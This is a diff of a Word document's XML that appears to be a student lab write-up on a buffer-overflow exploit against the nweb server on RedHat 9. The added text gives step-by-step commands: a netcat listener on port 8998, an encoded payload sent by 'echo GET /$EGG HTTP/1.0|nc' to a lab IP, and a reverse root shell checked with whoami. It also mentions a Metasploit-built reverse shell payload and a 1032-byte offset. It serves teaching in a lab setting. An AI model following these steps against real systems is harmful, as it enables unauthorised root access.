+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57966DDC" wp14:editId="68683B88">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="145200309" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="145200309" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Redhat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>NOTE: On the RedHat9 System, type the command “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>ulimit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -c unlimited” before starting </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>nweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Step 1: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Open a terminal and type “ls” to check </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>if the exploit file exists in the directory. (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>FileName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>: Red</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>at</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>BOE.py)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Step 2:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If the file exists in the directory, run the command “EGG=$(python3 Red</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>at</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>BOE.py)”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Step 3:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If that command successfully executes, open another </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>terminal</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and type the command “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nvlp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 8998”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Step 4:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If in the second terminal, the command returns “listening on [any] 8998 …”, then run the command “echo GET /$EGG HTTP/1.0|nc 192.168.32.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">0 8888” </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>on the first terminal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Step 5: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>The second terminal should receive something like: “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>connect to [192.168.32.10] from (UNKNOWN) [192.168.32.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>0] 32770</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>” at which point you could type “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>” to check if you are root.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="424A34C8" wp14:editId="5823E730">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1845655853" name="Picture 2" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1845655853" name="Picture 2" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -353,9 +1176,18 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> server on a Redhat8 machine with some defined parameters(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> server on a Redhat8 machine with some defined </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>parameters(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -417,7 +1249,23 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t>” scripts. The length for pattern create was 2000 and the offset received was 1032. The next part is to develop a shell script</w:t>
+        <w:t xml:space="preserve">” scripts. The length for pattern </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>create</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> was 2000 and the offset received was 1032. The next part is to develop a shell script</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -440,7 +1288,88 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> address who will be listening on some port. To </w:t>
+        <w:t xml:space="preserve"> address who will be listening on some port. To create the shell script, use the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> framework’s, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which will create a shell script with LHOST and LPORT, the shell code can also be specified for multiple languages, we used python. Now with the above information we </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>try</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to create the structure of the malicious input which we will send to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now, essentially when I was testing my work, I was running a shell script inside my python program which would create core dumps, however, after talking to the instructors, I think it is essential to understand that the first part of development is to see if your payload works or not, in our case would return a root shell. So, after about a week of using a script, I </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -448,72 +1377,23 @@
           <w:bCs/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">create the shell script, use the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> framework’s, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> which will create a shell script with LHOST and LPORT, the shell code can also be specified for multiple languages, we used python. Now with the above information we try to create the structure of the malicious input which we will send to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nweb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720" w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Now, essentially when I was testing my work, I was running a shell script inside my python program which would create core dumps, however, after talking to the instructors, I think it is essential to understand that the first part of development is to see if your payload works or not, in our case would return a root shell. So, after about a week of using a script, I switched to a process of having my python program print which is then filled into an environment variable “EGG”(Shawn likes eggs) and then using the command “echo GET /$EGG HTTP/1.0 | </w:t>
+        <w:t>switched to a process of having my python program print which is then filled into an environment variable “</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>EGG”(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Shawn likes eggs) and then using the command “echo GET /$EGG HTTP/1.0 | </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -602,7 +1482,25 @@
           <w:b/>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve">IMPORTANT NOTE: The offset, if counted, for me comes out to 1030. This is due to the fact that when in Python3 I pass my string as a byte literal it adds “b/” to the starting of the output. This creates 2 extra bytes when sending the exploit, therefore, we subtract it. </w:t>
+        <w:t xml:space="preserve">IMPORTANT NOTE: The offset, if counted, for me comes out to 1030. This is </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>due to the fact that</w:t>
+      </w:r>
